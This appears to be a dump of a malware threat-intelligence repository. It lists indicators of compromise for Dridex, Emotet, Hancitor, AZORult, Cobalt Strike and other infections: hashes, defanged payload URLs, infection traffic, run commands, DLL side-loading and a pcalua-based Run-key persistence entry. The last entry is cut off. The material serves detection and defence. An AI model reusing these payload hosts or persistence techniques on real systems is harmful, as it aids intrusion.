├── 2020-08-20-Emotet-infection-with-Qakbot.pcap.zip ├── 2020-08-20-IOCs-for-Emotet-infection-with-Qakbot.txt ├── 2020-08-24-Trickbot-gtag-ono66-IOCs.txt ├── 2020-08-25-IOCs-for-Emotet-with-Trickbot.txt ├── 2020-09-01-raccoon-stealer-IOCs.txt ├── 2020-09-07-Dridex-IOCs.txt ├── 2020-09-21-Dridex-IOCs.txt ├── 2020-09-28-Qakbot-IOCs.txt ├── 2020-10-01-Formbook-IOCs.txt ├── 2020-10-05-AZORult-IOCs.txt ├── 2020-10-26-Emotet-epoch-2-with-Trickbot-gtag-mor137-IOCs.txt ├── 2020-11-05-Hancitor-IOCs.txt ├── 2020-11-16-Cobalt-Strike-IOCs.txt ├── 2020-11-23-SmokeLoader-Dridex-and-webshell-IOCs.txt ├── 2020-11-23-SmokeLoader-and-Dridex-infection-with-webshell.pcap.zip ├── 2020-12-02-Astaroth-IOCs.txt ├── 2020-12-02-Astaroth-email-and-malware.zip ├── 2020-12-10-IOCs-from-Ursnif-infection-with-Delf-variant.txt ├── 2020-12-10-Ursnif-infection-with-Delf-variant.pcap.zip ├── 2020-12-11-Zepplin-ransomware-note.txt ├── 2020-12-14-IOCs-from-Qakbot-activity.txt ├── 2021-01-05-Emotet-and-Trickbot-IOCs.txt ├── 2021-01-06-SystemBC-domain-list.txt ├── 2021-01-08-IOCs-from-Ave-Maria-RAT.txt ├── 2021-01-11-IOCs-for-Dridex-traffic-with-webshell.txt ├── 2021-01-20-IOCs-from-Emotet-epoch1-infection.txt ├── 2021-02-01-TA551-IOCs-for-Qakbot.txt ├── 2021-02-08-tech-zupport-scam-audio.mp3 ├── 2021-02-22-IOCs-from-Guildma-infection.txt ├── 2021-03-01-IcedID-IOCs.txt ├── 2021-03-08-IOCs-from-Banload-infection.txt ├── 2021-03-15-IcedID-IOCs.txt ├── 2021-03-15-IcedID-infection-traffic.pcap.zip ├── 2021-03-15-IcedID-malware-and-artifacts.zip ├── 2021-03-15-malspam-pushing-IcedID.eml.zip ├── 2021-03-22-Dridex-malspam-10-examples.zip ├── 2021-03-22-Dridex-malware-and-artifacts.zip ├── 2021-03-22-IOCs-from-Dridex-infection.txt ├── 2021-03-24-IOCs-for-IcedID-infection-with-Cobalt-Strike.txt ├── 2021-03-24-IcedID-malware-and-artifacts.zip ├── 2021-04-12-IcedID-IOCs.txt ├── 2021-04-12-IcedID-malware-and-artifacts.zip ├── 2021-04-15-IOCs-for-AsyncRAT-activity.txt ├── 
2021-04-26-IcedID-with-Cobalt-Strike-IOCs.txt ├── 2021-04-26-IcedID-with-Cobalt-Strike-malware-and-artifacts.zip ├── 2021-04-26-IcedID-with-Cobalt-Strike-traffic.pcap.zip ├── 2021-05-10-IOCs-for-TA551-pushing-IcedID.txt ├── 2021-05-10-TA551-IcedID-malware-and-artifacts.zip ├── 2021-05-17-TA551-IOCs-for-IcedID.txt ├── 2021-05-17-TA551-IcedID-malware-and-artifacts.zip ├── 2021-06-07-Mirai-IOCs.md ├── 2021-06-21-TA551-IOCs-for-Ursnif.txt ├── 2021-06-28-TA551-IOCs-for-Trickbot.txt ├── 2021-07-12-Hancitor-IOCs.txt ├── 2021-07-20-IOCs-for-BazarLoader-and-Trickbot.txt ├── 2021-07-26-Trickbot-gtag-rob112.txt ├── 2021-07-29-IOCs-for-BazarLoader-CobaltStrike-PrintNightmare.txt ├── 2021-08-09-BazarLoader-and-Cobalt-Strike-IOCs.txt ├── 2021-08-16-Mirai-IOCs.md ├── 2021-08-18-phishing-example.txt ├── 2021-08-26-IOCs-for-DDoS-themed-BazarLoader-infection.txt ├── 2021-09-08-IOCs-for-Hancitor-with-Cobalt-Strike.txt ├── 2021-09-13-IOCs-for-TA551-Trickbot-with-Cobalt-Strike-and-DarkVNC.txt ├── 2021-09-20-IOCs-for-Squirrelwaffle-Loader-with-Cobalt-Strike.txt ├── 2021-09-29-TA551-BazarLoader-with-Cobalt-Strike-IOCs.txt ├── 2021-10-07-Qakbot-obama111-and-Cobalt-Strike-IOCs.txt ├── 2021-10-07-Qakbot-obama111-and-Cobalt-Strike-malware-and-artifacts.zip ├── 2021-10-18-IOCs-for-TR-based-Qakbot-with-Cobalt-Strike.txt ├── 2021-11-03-TA551-BazarLoader-info.txt ├── 2021-11-04-IOCs-for-TR-Qakbot-with-Cobalt-Strike.txt ├── 2021-11-05-TA551-IOCs.txt ├── 2021-11-15-IOCs-for-Matanbuchus-Qakbot-CobaltStrike-and-spambot-activity.txt ├── 2021-11-22-IOCs-for-Contact-Forms-campaign-activity.txt ├── 2021-12-07-IOCs-for-Qakbot-and-Matanbuchus-activity.txt ├── 2021-12-10-IOCs-for-TA551-IcedID-infection-with-Cobalt-Strike-and-DarkVNC.txt ├── 2022-01-04-IOCs-from-Remcos-RAT-infection.txt ├── 2022-01-05-IOCs-for-TA551-IcedID-with-Cobalt-Strike.txt ├── 2022-01-12-IOCs-for-IcedID-with-Cobalt-Strike-and-DarkVNC.txt ├── 2022-01-17-IOCs-for-Astaroth-Guildma-infection.txt ├── 
2022-01-27-IOCs-for-Contact-Forms-IcedID-with-Cobalt-Strike.txt ├── 2022-02-07-IOCs-for-BazarLoader-with-Cobalt-Strike.txt ├── 2022-02-10-IOCs-for-Emotet-epoch5-infection-with-Cobalt-Strike.txt ├── 2022-02-17-IOCs-for-Bazil-targeted-malware-infection.txt ├── 2022-02-22-Emotet-epoch4-IOCs.txt ├── 2022-02-22-Emotet-epoch5-IOCs.txt ├── 2022-03-01-IOCs-for-Emotet-epoch4-with-Cobalt-Strike.txt ├── 2022-03-03-IOCs-for-Bazil-targeted-malware-infection.txt ├── 2022-03-03-IOCs-for-Emotet-epoch4-with-Cobalt-Strike.txt ├── 2022-03-14-IOCs-from-Emotet-epoch5-with-Cobalt-Strike.txt ├── 2022-03-21-IOCs-for-Cobalt-Strike-from-IcedID-infection.txt ├── 2022-03-29-IOCs-for-Emotet-and-Cobalt-Strike.txt ├── 2022-04-05-IOCs-for-Bumblebee-and-Cobalt-Strike.txt ├── 2022-04-12-IOCs-for-SpringShell-exploitation-by-Enemybot.txt ├── 2022-04-14-IOCs-for-aa-Qakbot-with-Cobalt-Strike.txt ├── 2022-04-19-IOCS-for-infection-from-Brazil-malspam.txt ├── 2022-04-25-IOCs-for-Emotet-epoch4.txt ├── 2022-05-03-IOCs-for-Contact-Forms-Bumblebee-and-Cobalt-Strike.txt ├── 2022-05-10-IOCs-for-Contact-Forms-IcedID-with-Cobalt-Strike.txt ├── 2022-05-15-Deadbolt-Ransomware.md ├── 2022-05-17-IOCS-for-aa-distribution-Qakbot-with-Cobalt-Strike.txt ├── 2022-05-23-IOCs-for-IcedID-and-DarkVNC.txt ├── 2022-06-07-IOCs-for-Emotet-with-Cobalt-Strike.txt ├── 2022-06-09-IOCs-from-TA578-Bumblebee-with-Cobalt-Strike.txt ├── 2022-06-14-IOCs-from-TA578-Bumblebee-with-Cobalt-Strike.txt ├── 2022-06-17-IOCs-for-Matanbuchus-with-Cobalt-Strike.txt ├── 2022-06-21-IOCs-for-AA-distribution-Qakbot-with-DarkVNC-and-Cobalt-Strike.txt ├── 2022-06-28-IOCs-for-TA578-IcedID-Cobalt-Strike-and-DarkVNC.txt ├── 2022-07-06-IOCs-for-TA578-contact-forms-IcedID-with-DarkVNC-and-Cobalt-Strike.txt ├── 2022-07-21-IOCs-for-IcedID-with-DarkVNC-and-Cobalt-Strike.txt ├── 2022-07-25-IOCs-for-IcedID-with-Cobalt-Strike.txt ├── 2022-08-03-IOCs-for-IcedID-and-Cobalt-Strike.txt ├── 2022-08-08-IOCs-for-IcedID-and-Cobalt-Strike.txt ├── 
2022-08-10-IOCs-for-IcedID-and-Cobalt-Strike.txt ├── 2022-08-15-IOCs-for-Monster-Libra-SVCready.txt ├── 2022-08-29-IOCs-for-Monster-Libra-TA551-IcedID-with-Cobalt-Stike.txt ├── 2022-09-13-IOCs-for-Qakbot.txt ├── 2022-09-21-IOCs-for-Astaroth-Guildma-infection.txt ├── 2022-09-29-IOCs-for-Obama207-Qakbot-and-Cobalt-Strike.txt ├── 2022-10-04-IOCs-for-IcedID-infection-with-Cobalt-Strike.txt ├── 2022-10-10-IOCs-for-Cobalt-Strike-from-Qakbot-infection.txt ├── 2022-10-17-IOCs-for-IcedID-with-Cobalt-Strike.txt ├── 2022-10-31-IOCs-for-IcedID-with-DarkVNC-and-Cobalt-Strike.txt ├── 2022-11-03-IOCs-for-Emotet-with-IcedID.txt ├── 2022-11-07-IOCs-for-Emotet-infection-with-IcedID-and-Bumblebee.txt ├── 2022-11-28-IOCs-for-BB08-Qakbot-with-Cobalt-Strike.txt ├── 2022-12-07-IOCs-for-Bumblebee-infection-with-Cobalt-Strike.txt ├── 2022-12-09-IOCs-for-HTML-smuggling-to-ISO-files-for-Cobalt-Strike.txt ├── 2022-12-20-IOCs-for-IcedID-infection-with-Cobalt-Strike.txt ├── 2022-12-28-IOCs-for-NetSupport-RAT-infection.txt ├── 2022-12-29-IOCs-for-malware-from-fake-Adobe-Reader-page.txt ├── 2023-01-05-IOCs-from-Agent-Tesla-variant-infection.txt ├── 2023-01-12-IOCs-from-IcedID-and-Cobalt-Strike-infection.txt ├── 2023-01-16-IOCs-for-malware-from-fake-7zip-page.txt ├── 2023-01-23-IOCs-for-Google-ad-for-possible-TA505-activity.txt ├── 2023-01-31-BB12-Qakbot-infection-IOCs.txt ├── 2023-02-07-IOCs-for-probable-Matanbuchus-activity.txt ├── 2023-02-08-IOCs-for-Cobalt-Strike-from-IcedID.txt ├── 2023-02-13-IOCs-for-IcedID-infection-from-fake-Microsoft-Teams-page.txt ├── 2023-02-24-IOCs-for-IcedID-infection-with-BackConnect-and-Cobalt-Strike.txt ├── 2023-03-06-IOCs-for-Gozi-infection.txt ├── 2023-03-07-IOCs-for-Emotet-activity.txt ├── 2023-03-10-IOCs-for-CloakedUrsa-APT29-Activity.txt ├── 2023-03-16-IOCs-for-Emotet-E5-activity.txt ├── 2023-03-22-some-IOCs-for-Emotet-E4-activity.txt ├── 2023-04-05-IOCs-for-STRRAT-activity.txt ├── 2023-04-13-IOCs-for-MetaStealer-infection.txt ├── 
2023-05-02-IOCs-for-obama259-Qakbot.txt ├── 2023-05-10-IOCs-for-IcedID-with-BackConnect-and-Keyhole-VNC-and-Cobalt-Strike.txt ├── 2023-05-10-IOCs-for-obama262-Qakbot-with-DarkCat-VNC-and-Cobalt-Strike.txt ├── 2023-05-17-IOCs-for-Pikabot-with-Cobalt-Strike.txt ├── 2023-05-22-IOCs-for-Pikabot-infection-with-Cobalt-Strike.txt ├── 2023-05-23-IOCs-for-Pikabot-with-Cobalt-Strike.txt ├── 2023-06-28-IOCs-for-IcedID-activity.txt ├── 2023-07-12-IOCs-from-Gozi-infection-with-Cobalt-Strike.txt ├── 2023-08-03-IOCs-for-malicious-ad-to-Danabot.txt ├── 2023-08-09-IOCs-from-IcedID-infection.txt ├── 2023-08-10-moved-to-new-Github-repository.txt ├── Mirai_updated_F5 └── README.md /2020-08-20-Emotet-infection-with-Qakbot.pcap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2020-08-20-Emotet-infection-with-Qakbot.pcap.zip -------------------------------------------------------------------------------- /2020-09-01-raccoon-stealer-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2020-09-01 (TUESDAY) - RACCOON STEALER 2 | 3 | EMAIL INFO: 4 | 5 | - Date: Wed, 2 Sep 2020 00:48:48 +0800 (HKT) 6 | - Received: from mail.grandco.com.hk ([223.255.188.26]) 7 | - From: 8 | - Subject: Purchase Order 9 | - Message-ID: <956139821.4117.1598978928194.JavaMail.root@mail.grandco.com.hk> 10 | - Attachment: Purchase Order.xlsx 11 | 12 | ASSOCIATED MALWARE: 13 | 14 | - SHA256 hash: 2ed32602e42ca10c7b505a3581ddb0dbbe0f3e19a6e8a63e6ff0a7325ca54a3b 15 | - File size: 573,197 bytes 16 | - File name: Purchase Order.xlsx 17 | - File description: Excel spreadsheet with CVE-2017-11882 exploit for Raccoon Stealer 18 | 19 | - SHA256 hash: c91e2df02ad2c8ccadc96054bceee4422382caa62d443e2633a003e4ce5c7476 20 | - File size: 507,904 bytes 21 | - File location: hxxp://boyama.medyanef[.]com/vendor/league/fractal/files/c7f6e7.exe 22 | - File location: 
C:\Users\[username]\AppData\Roaming\RichX.com 23 | - File description: Windows executable (EXE) file for Raccoon Stealer 24 | 25 | INFECTION TRAFFIC: 26 | 27 | - 93.113.63[.]58 port 80 - boyama[.]medyanef[.]com - GET /vendor/league/fractal/files/c7f6e7.exe 28 | - 195.201.225[.]248 port 443 - telete[.]in - HTTPS traffic 29 | - 34.89.241[.]53 port 80 - 34.89.241[.]53 - POST /gate/log.php 30 | - 34.89.241[.]53 port 80 - 34.89.241[.]53 - GET /gate/sqlite3.dll 31 | - 34.89.241[.]53 port 80 - 34.89.241[.]53 - GET /gate/libs.zip 32 | - 34.89.241[.]53 port 80 - 34.89.241[.]53 - POST /file_handler4/file.php?hash=[hash string and other parameters] -------------------------------------------------------------------------------- /2020-09-21-Dridex-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2020-09-21 - INFECTION FROM DRIDEX MALSPAM 2 | 3 | EMAIL HEADER DATA: 4 | 5 | - Received: from [91.81.229.185] (unknown [91.81.229.185]) by [removed]; Mon, 21 Sep 2020 14:25:24 +0200 (CEST) 6 | - Received: from [1.124.14.21] (helo=FAWADUM.esa4.dhl-out.iphmx.com) by [removed] (envelope-from watercourse71@gateway2d.dhl.com) [removed]; Mon, 21 Sep 2020 13:25:24 +0100 7 | - Date: Mon, 21 Sep 2020 13:25:24 +0100 8 | - From: BillingOnline 9 | - Subject: FedEx Billing Online - Invoice Ready for Payment 10 | 11 | ONE OF AT LEAST 10 URLS GENERATED BY EXCEL MACRO: 12 | 13 | - hxxps://cdn.applimmo[.]com/wxmn5b.pdf 14 | - hxxps://mazimimarlik[.]com/ow1oorywn.pdf 15 | - hxxps://lamesuspendue.swayb[.]com/pxxnmie14.zip 16 | - hxxps://laptopsservicecenter[.]in/s3k9ebe2.pdf 17 | - hxxps://mail.168vitheyrealestate[.]com/k5hkyj0.zip 18 | - hxxps://retrodays[.]pt/lhtzu8p.zip 19 | - hxxps://skybeetravels.cheapflightso[.]co[.]uk/py198k.pdf 20 | - hxxps://starsignsdates[.]com/hurxlu8.pdf 21 | - hxxps://stepco[.]ro/wij87mvg.txt 22 | - hxxps://update.cabinetulieru[.]ro/thhqpn.txt 23 | 24 | DRIDEX POST-INFECTION HTTPS TRAFFIC 25 | 26 | - 51.75.24[.]85 port 443 27 | 
- 109.169.24[.]37 port 453 28 | 29 | ASSOCIATED MALWARE: 30 | 31 | - SHA256 hash: 3259221b5378b9c9a983ae265527662c0c7856f6664a9a734754f549ee4d7a33 32 | - File size: 28,618 bytes 33 | - File name: 5-107-26477.xlsm 34 | - File description: Excel spreadsheet with macro for Dridex 35 | 36 | - SHA256 hash: 5b4337f9ae1d91113c91abd0da39794d8aa216b149562440de541ca99618840d 37 | - File size: 331,776 bytes 38 | - File location: hxxps://cdn.applimmo[.]com/wxmn5b.pdf 39 | - File location: C:\XMjrcrYY\WZzAVF\XkZVNh 40 | - Run method: regsvr32.exe /s [file name] 41 | - File description: DLL installer retrieved by Excel macro for Dridex 42 | - Note: Random characters for directory path and file name each infection 43 | 44 | - SHA256 hash: 55067d633bef8350b5de24e3e9f153fc4a6765af0af168fb444a6329c701b10a 45 | - File size: 1,017,344 bytes 46 | - File location: C:\Users\[username]\AppData\Roaming\Microsoft\Templates\LiveContent\bGGj9sX\MFC42u.DLL 47 | - File description: Dridex malware DLL 48 | - Note: Run by copy of legitimate system file DevicePairingWizard.exe in the same directory (DLL side-loading: the malicious DLL carries the name of a legitimate library the copied EXE loads) 49 | 50 | - SHA256 hash: 8a7cc23e3b7af9ebd2d1dd3791bb62bd1da1efd3d2c480fa51483552520abd0a 51 | - File size: 1,012,224 bytes 52 | - File location: C:\Users\[username]\AppData\Roaming\Sun\0umgO\WTSAPI32.dll 53 | - File description: Dridex malware DLL 54 | - Note: Run by copy of legitimate system file rdpclip.exe in the same directory (DLL side-loading) 55 | 56 | - SHA256 hash: eb3c152be59903d29cf02100ed2f9edea183a37882a68ae5655bcbc9004775d8 57 | - File size: 1,009,664 bytes 58 | - File location: C:\Users\[username]\AppData\Roaming\Thunderbird\Profiles\1ovarfyl.default-release\ImapMail\.outlook.com\yFYLx\XmlLite.dll 59 | - File description: Dridex malware DLL 60 | - Note: Run by copy of legitimate system file sppsvc.exe in the same directory (DLL side-loading) 61 | -------------------------------------------------------------------------------- /2020-10-05-AZORult-IOCs.txt: 
-------------------------------------------------------------------------------- 1 | 2020-10-05 (MONDAY) - MALSPAM WITH XLS ATTACHMENT PUSHES AZORULT MALWARE 2 | 3 | EMAIL HEADERS: 4 | 5 | Return-Path: 6 | Authentication-Results: [removed]; iprev=pass policy.iprev="203.78.160.41"; spf=neutral smtp.mailfrom="neeltravels@infoclub.com.np" smtp.helo="mx2.info.com.np"; dkim=none (message not signed) header.d=none; dmarc=none (p=nil; dis=none) header.from=infoclub.com.np 7 | Received: from [203.78.160.41] ([203.78.160.41:42046] helo=mx2.info.com.np) 8 | by [removed] (envelope-from ) 9 | [removed] ; Mon, 05 Oct 2020 10:21:53 -0400 10 | Received: from localhost (localhost [127.0.0.1]) 11 | by mx2.info.com.np (Postfix) with ESMTP id 9D004C010EEDA; 12 | Mon, 5 Oct 2020 20:05:27 +0545 (+0545) 13 | Received: from mx2.info.com.np ([127.0.0.1]) 14 | by localhost (mx2.info.com.np [127.0.0.1]) (amavisd-new, port 10032) 15 | with ESMTP id NxFAiUUDPfZM; Mon, 5 Oct 2020 20:05:26 +0545 (+0545) 16 | Received: from localhost (localhost [127.0.0.1]) 17 | by mx2.info.com.np (Postfix) with ESMTP id B3A6BC01205B7; 18 | Mon, 5 Oct 2020 20:05:25 +0545 (+0545) 19 | Received: from mx2.info.com.np ([127.0.0.1]) 20 | by localhost (mx2.info.com.np [127.0.0.1]) (amavisd-new, port 10026) 21 | with ESMTP id 2Hz7ajN5BfmV; Mon, 5 Oct 2020 20:05:25 +0545 (+0545) 22 | Received: from mx2.info.com.np (mx2.info.com.np [203.78.160.41]) 23 | by mx2.info.com.np (Postfix) with ESMTP id B1E23C010EED6; 24 | Mon, 5 Oct 2020 20:05:23 +0545 (+0545) 25 | Date: Mon, 5 Oct 2020 20:05:23 +0545 (NPT) 26 | From: neeltravels@infoclub.com.np 27 | Message-ID: <335140558.5692.1601907623511.JavaMail.zimbra@infoclub.com.np> 28 | In-Reply-To: <1021474505.5156.1601907307814.JavaMail.zimbra@infoclub.com.np> 29 | References: <602698068.4733.1601907066008.JavaMail.zimbra@infoclub.com.np> <1860825462.4783.1601907203188.JavaMail.zimbra@infoclub.com.np> <484309969.4798.1601907221459.JavaMail.zimbra@infoclub.com.np> 
<1444625393.4863.1601907238395.JavaMail.zimbra@infoclub.com.np> <1285123696.4933.1601907261734.JavaMail.zimbra@infoclub.com.np> <1879308695.4992.1601907285968.JavaMail.zimbra@infoclub.com.np> <1021474505.5156.1601907307814.JavaMail.zimbra@infoclub.com.np> 30 | Subject: Order confirmation 31 | MIME-Version: 1.0 32 | Content-Type: multipart/mixed; 33 | boundary="----=_Part_5684_151580814.1601907623466" 34 | X-Mailer: Zimbra 8.6.0_GA_1153 (ZimbraWebClient - FF81 (Win)/8.6.0_GA_1153) 35 | Thread-Topic: Order confirmation 36 | Thread-Index: 2VBCTeFcpKsqezW/qovDHEXVLMew2cAVOyZvAX/6jocf2g0v5XT0r/qLX4VEbQbMwFb9VbHuNr30 37 | 38 | Attachment name: 0617773.xls 39 | 40 | ASSOCIATED MALWARE: 41 | 42 | - SHA256 hash: 024512629393c80c1434eb25694c9f1e65d813cd3c273c6d97572ec62d8ad655 43 | - File size: 462,848 bytes 44 | - File name: 0617773.xls 45 | - File description: Excel spreadsheet with macro for AZORult malware 46 | 47 | - SHA256 hash: b2fe9bcc932ea65ec98318fd983e862172123cab111e728d97c23258749521c7 48 | - File size: 308,736 bytes 49 | - File location: hxxp://192.236.178[.]80/7z/0617773.jpg 50 | - File location: C:\Users\Public\whpfwkrul.exe (initial location) 51 | - File location: C:\Users\[username]\chrmo.exe (persistent location) 52 | - File description: Windows EXE for AZORult (served with a .jpg extension, saved as an EXE) 53 | 54 | MALWARE PERSISTENCE (REGISTRY UPDATE): 55 | 56 | - Registry key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 57 | - Value name: nspj 58 | - Value type: REG_SZ 59 | - Value data: C:\WINDOWS\system32\pcalua.exe -a C:\Users\[username]\chrmo.exe (pcalua.exe is the signed Program Compatibility Assistant binary; its -a switch launches the given program, so the Run entry proxies execution of chrmo.exe through a legitimate Windows binary) 60 | 61 | INFECTION TRAFFIC: 62 | 63 | - 192.236.178[.]80 port 80 - 192.236.178[.]80 - GET /7z/0617773.jpg 64 | - 198.50.160[.]198 port 80 - books.myscriptcase[.]com - POST /index.php -------------------------------------------------------------------------------- /2020-10-26-Emotet-epoch-2-with-Trickbot-gtag-mor137-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2020-10-26 (MONDAY) - 
EMOTET EPOCH 2 INFECTION WITH TRICKBOT GTAG MOR137 2 | 3 | - SHA256 hash: 8d1691f2c09cc9372b30697a8e5c5ea2d7377673195c7eefc1fdb44e727332a3 4 | - File size: 182,784 bytes 5 | - File location: hxxp://worldkhobor[.]com/wp-admin/l/ 6 | - File name: FILE_JKO_100120_WGF_102620.doc 7 | - File description: Word doc with macros for Emotet (Epoch 2) 8 | 9 | - SHA256 hash: ea85a6c527fc7174b1b953e6d5b2a617e79703ad1fa1db9f4ba131e0a477a544 10 | - File size: 180,224 bytes 11 | - File location: hxxps://needhelp[.]gr/wp-includes/Qlpz/ 12 | - File location: C:\Users\[username]\Uflw5pa\W18vpk2\Nfd9nts.exe 13 | - File location: C:\Users\[username]\AppData\Local\SyncHost\subst.exe 14 | - File description: Emotet EXE (Epoch 2) 15 | 16 | - SHA256 hash: 58c4bea082b2f44f0beab5356ae2bc9bc73c3f13ab0491861bc2ba24690da103 17 | - File size: 806,912 bytes 18 | - File location: C:\Users\[username]\AppData\Local\SyncHost\sfc8b4.exe 19 | - File location: C:\Users\[username]\AppData\Roaming\Identities1159371911\sfc8b4.exe 20 | - File description: Trickbot gtag mor137 retrieved by Emotet-infected host -------------------------------------------------------------------------------- /2020-11-05-Hancitor-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2020-11-05 (THURSDAY) - MALSPAM PUSHING HANCITOR WITH FICKER STEALER 2 | 3 | DATA FROM 5 EMAIL EXAMPLES: 4 | 5 | - Date: Thu, 05 Nov 2020 17:00:06 +0000 6 | - Date: Thu, 05 Nov 2020 17:10:35 +0000 7 | - Date: Thu, 05 Nov 2020 17:55:53 +0000 8 | - Date: Thu, 05 Nov 2020 16:43:48 +0000 9 | - Date: Thu, 05 Nov 2020 18:35:05 +0000 10 | - Date: Thu, 05 Nov 2020 18:35:18 +0000 11 | 12 | - Received: from ithelpinc[.]org ([202.212.14[.]56]) 13 | - Received: from ithelpinc[.]org ([24.247.141[.]190]) 14 | - Received: from ithelpinc[.]org ([76.108.208[.]220]) 15 | - Received: from ithelpinc[.]org ([91.183.51[.]218]) 16 | - Received: from ithelpinc[.]org ([95.43.129[.]130]) 17 | 18 | - From: "DocuSign Electronic Signature 
and Invoice Service" 19 | - From: "DocuSign Electronic Signature and Invoice Service" 20 | - From: "DocuSign Signature and Invoice Service" 21 | - From: "DocuSign Signature and Invoice Service" 22 | - From: "DocuSign Electronic Signature " 23 | 24 | LINKS FROM THE EMAILS: 25 | 26 | - hxxps://docs.google[.]com/document/d/e/2PACX-1vS9eYBTxfr5CxwRCgbj4pTgB8lYGoJmX5OCd3sC9FWqvH4lSeF9xB9jCEyORQ-5Zq2p9wKzANWKhDJC/pub 27 | - hxxps://docs.google[.]com/document/d/e/2PACX-1vSbGqFLcGVhFotIYWaVVVa10mQzpa3K-ZvHiIgmXuXlBNn30VsrifoFCbJiATr59q1N2GW_Ql2Qekft/pub 28 | - hxxps://docs.google[.]com/document/d/e/2PACX-1vTw6IC-OOkyMoyGFzz8a3vHzMOt7SjXENwp7MRU9t6E1ksTa4453G8cZP9h_WMiqqqoHrOrt5x31vNl/pub 29 | - hxxps://docs.google[.]com/document/d/e/2PACX-1vTmbkS2yR03U4Ai05mEEPk6VmzE-WvPDSJevHXVSJIvF4IBseobfEhlTgX90xdKM01WbMEnbH5TpmKw/pub 30 | - hxxps://docs.google[.]com/document/d/e/2PACX-1vTDw0DsSLMSPUztBwnF5RfHDG43G00uIjp5xKT_4dpXZXIxuy0CXN3muPla1t07cmDEHROvgpoNck9u/pub 31 | 32 | REDIRECT URLS FROM THE ABOVE GOOGLE DOCS PAGES TO DOWNLOAD WORD DOC FOR HANCITOR: 33 | 34 | - hxxps://ideas.bizbrio[.]com/phone.php 35 | - hxxps://rishtiindia[.]com/count.php 36 | - hxxps://pixellanestudios[.]com/permission.php 37 | - hxxps://crazydeal101[.]com/play.php 38 | 39 | ASSOCIATED MALWARE: 40 | 41 | - SHA256 hash: 9d8cb1204c8357152aec8acbf14092de7edd88189eaa6f9cfb8b9b8dbff001e8 42 | - File size: 375,261 bytes 43 | - File name: 1105_748543.doc 44 | - File description: Word doc with macro for Hancitor malware 45 | 46 | - SHA256 hash: 09b3c97457d3ad02204f2da76d1f9f4dadc681bcb32b0a58469461df2f7bd6b7 47 | - File size: 314,368 bytes 48 | - File location: C:\Users\[username]\AppData\Roaming\Microsoft\Templates\calc.dll 49 | - File description: DLL file for Hancitor 50 | - File run method: rundll32.exe calc.dll,Start 51 | 52 | - SHA256 hash: 9bdbb8dde9ad9be8d9303df1697e13a0f846cca95bc9e41d513c1f5f2a7a37b3 53 | - File size: 272,910 bytes 54 | - File location: hxxp://ithelpstaffing[.]com/f4n.exe 55 | - File 
description: follow-up malware, Ficker Stealer 56 | 57 | HANCITOR INFECTION TRAFFIC: 58 | 59 | - port 80 - api.ipify.org - GET / (IP address check, not inherently malicious) 60 | - 193.47.35[.]27 port 80 - albilverde[.]com - POST /7/forum.php 61 | - 5.187.5[.]246 port 80 - fabickng[.]ru - POST /7/forum.php 62 | - 179.43.160[.]81 port 80 - fineladiver[.]ru - POST /7/forum.php 63 | 64 | FICKER STEALER INFECTION TRAFFIC: 65 | 66 | - 47.254.169[.]130 port 80 - ithelpstaffing[.]com - GET /f4n.exe 67 | - port 80 - api.ipify.org - GET /?format=xml (IP address check, not inherently malicious) 68 | - 62.76.40[.]132 port 80 - cussoricti[.]com - TCP traffic (not HTTP) -------------------------------------------------------------------------------- /2020-11-16-Cobalt-Strike-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2020-11-16 (MONDAY) - XLSB SPREADSHEET PUSHES COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - Until mid-November 2020, we normally saw this spreadsheet template push Qakbot; since then it has started pushing other malware families instead of Qakbot. 6 | - Since mid-November 2020, we've occasionally seen this spreadsheet template push SmokeLoader or Cobalt Strike malware. 
7 | 8 | ASSOCIATED MALWARE: 9 | 10 | - SHA256 hash: 4af251feed5a80976f897a0749147b74ec92ad90695eea87eeb21f83a41cff7f 11 | - File size: 366,296 bytes 12 | - File name: Document11355.xlsb 13 | - File description: Excel spreadsheet (.xlsb) with macros for Cobalt Strike 14 | 15 | - SHA256 hash: c81cbf497e7427936c0f15290fe4a1648c8fc10c249d3b97e67897bd1e2808b6 16 | - File size: 237,568 bytes 17 | - File location: hxxp://99promo[.]com/ds/161120.gif 18 | - File location: C:\1b3SX\iD93\tor.exe 19 | - File description: Windows executable file (EXE) for Cobalt Strike 20 | 21 | INFECTION TRAFFIC: 22 | 23 | - 35.209.123[.]121 port 80 - 99promo[.]com - GET /ds/161120.gif 24 | - 185.99.133[.]180 port 80 - 185.99.133[.]180 - GET /IE9CompatViewList.xml 25 | - 185.99.133[.]180 port 80 - 185.99.133[.]180 - POST /submit.php?id=12345678 26 | - NOTE: 12345678 in the above line replaces an 8-digit identification number for the infected Windows host -------------------------------------------------------------------------------- /2020-11-23-SmokeLoader-and-Dridex-infection-with-webshell.pcap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2020-11-23-SmokeLoader-and-Dridex-infection-with-webshell.pcap.zip -------------------------------------------------------------------------------- /2020-12-02-Astaroth-email-and-malware.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2020-12-02-Astaroth-email-and-malware.zip -------------------------------------------------------------------------------- /2020-12-10-IOCs-from-Ursnif-infection-with-Delf-variant.txt: -------------------------------------------------------------------------------- 1 | 2020-12-10 (THURSDAY) - EXCEL MACRO PUSHES URSNIF (GOZI/ISFB) WITH DELF VARIANT 2 | 3 | NOTES: 4 | 5 | - This is 
